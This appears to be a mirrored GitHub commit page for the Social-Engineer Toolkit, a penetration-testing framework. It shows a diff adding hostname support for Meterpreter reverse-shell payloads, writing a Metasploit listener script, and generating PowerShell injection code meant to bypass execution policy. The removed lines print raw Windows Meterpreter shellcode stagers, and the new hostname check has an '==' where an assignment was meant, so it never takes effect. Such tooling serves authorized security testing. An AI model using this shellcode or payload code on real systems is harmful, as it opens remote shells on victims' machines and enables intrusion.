mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-27 06:50:18 +00:00
Added the ability to use hostnames and fixed readme bug
This commit is contained in:
trustedsec
parent
a4f6ea195f
commit
75af98ee3e
4 changed files with 30 additions and 14 deletions
|
|
@ -1,3 +1,10 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 4.3.10
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* Fixed a bug that would cause README to error out (thanks Chris Barrow).
|
||||
* Added the ability to use hostnames with payloads including pyinjector and multiinjector
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 4.3.9
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
|
|||
|
|
@ -469,6 +469,12 @@ try:
|
|||
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
|
||||
filewrite.close()
|
||||
|
||||
if validate_ip(choice2) == False:
|
||||
if choice9 != "windows/meterpreter/reverse_https":
|
||||
if choice9 != "windows/meterpreter/reverse_http":
|
||||
print_status("Possible hostname detected, switching to windows/meterpreter/reverse_https")
|
||||
choice9 == "windows/meterpreter/reverse_https"
|
||||
|
||||
if choice9 == "windows/meterpreter/reverse_tcp_allports": portnum = "LPORT=1"
|
||||
|
||||
if choice9 == "windows/meterpreter/reverse_tcp":
|
||||
|
|
@ -480,20 +486,21 @@ try:
|
|||
shellcode = generate_shellcode(choice9, choice2,portnum)
|
||||
if choice9 == "windows/meterpreter/reverse_http":
|
||||
print_status("Reverse_HTTP takes a few seconds to calculate..One moment..")
|
||||
#shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x4b\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x34\x59\x31\xd2\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x6a\x10\x5b\x31\xff\x57\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a\x4b\x74\x10\xeb\xe9\xeb\x49\xe8\xc7\xff\xff\xff\x2f\x64\x57\x70\x31\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\x65\xff\xff\xff\x32\x35\x35\x2e\x32\x35\x34\x2e\x32\x35\x33\x2e\x32\x35\x32\x00"
|
||||
shellcode = generate_shellcode(choice9, choice2,portnum)
|
||||
if choice9 == "windows/meterpreter/reverse_tcp_allports":
|
||||
#shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\xff\xfe\xfd\xfc\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x12\x31\xc0\x66\x8b\x46\x02\x86\xe0\x66\x40\x86\xe0\x66\x89\x46\x02\xeb\xdf\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"
|
||||
print_status("Reverse TCP Allports takes a few seconds to calculate..One moment..")
|
||||
shellcode = generate_shellcode(choice9, choice2,portnum)
|
||||
if choice9 == "windows/shell/reverse_tcp":
|
||||
print_status("Reverse Shell takes a few seconds to calculate..One moment..")
|
||||
shellcode = generate_shellcode(choice9, choice2, portnum)
|
||||
|
||||
|
||||
if choice1 == "shellcode/pyinject":
|
||||
shellcode_port = portnum.replace("LPORT=", "")
|
||||
|
||||
shellcode = shellcode_replace(choice2, shellcode_port, shellcode)
|
||||
|
||||
if validate_ip(choice2) == True:
|
||||
shellcode = shellcode_replace(choice2, shellcode_port, shellcode)
|
||||
|
||||
# break out of the loop if we are only using one payload else keep on
|
||||
if choice1 == "shellcode/pyinject": break
|
||||
multipyinject_payload += shellcode + ","
|
||||
|
|
|
|||
|
|
@ -215,7 +215,7 @@ def print_error(message):
|
|||
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
||||
|
||||
def get_version():
|
||||
define_version = '4.3.9'
|
||||
define_version = '4.3.10'
|
||||
return define_version
|
||||
|
||||
class create_menu:
|
||||
|
|
@ -503,7 +503,7 @@ def update_set():
|
|||
# Pull the help menu here
|
||||
#
|
||||
def help_menu():
|
||||
fileopen = file("README","r").readlines()
|
||||
fileopen = file("README.txt","r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
print line
|
||||
|
|
@ -835,7 +835,7 @@ def show_banner(define_version,graphic):
|
|||
print bcolors.BLUE + """
|
||||
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
|
||||
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
|
||||
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
|
||||
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
|
||||
[---] Codename: '""" + bcolors.YELLOW + """Turbulence""" + bcolors.BLUE + """' [---]
|
||||
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
|
||||
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
|
||||
|
|
|
|||
|
|
@ -29,17 +29,18 @@ else:
|
|||
|
||||
powershell_inject_x64 = check_config("POWERSHELL_INJECT_PAYLOAD_X64=")
|
||||
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
|
||||
#def metasploit_shellcode(payload):
|
||||
print_status("Generating x64-based powershell injection code...")
|
||||
x64 = metasploit_shellcode(powershell_inject_x64)
|
||||
x64 = shellcode_replace(ipaddr,port, x64)
|
||||
|
||||
if validate_ip(ipaddr) == False:
|
||||
powershell_inject_x64 = "windows/meterpreter/reverse_https"
|
||||
powershell_inject_x86 = "windows/meterpreter/reverse_http"
|
||||
|
||||
x64 = ""
|
||||
x86 = ""
|
||||
|
||||
x64 = generate_powershell_alphanumeric_payload(powershell_inject_x64, ipaddr, port, x64)
|
||||
|
||||
print_status("Generating x86-based powershell injection code...")
|
||||
x86 = metasploit_shellcode(powershell_inject_x86)
|
||||
x86 = shellcode_replace(ipaddr, port, x86)
|
||||
x86 = generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
|
||||
|
||||
# check to see if we want to display the powershell command to the user
|
||||
verbose = check_config("POWERSHELL_VERBOSE=")
|
||||
if verbose.lower() == "on":
|
||||
|
|
@ -58,3 +59,4 @@ filewrite.write(x86)
|
|||
filewrite.close()
|
||||
print_status("Finished generating powershell injection bypass.")
|
||||
print_status("Encoded to bypass exececution restriction policy...")
|
||||
|
||||
|
|
|
|||
Loading…
Reference in a new issue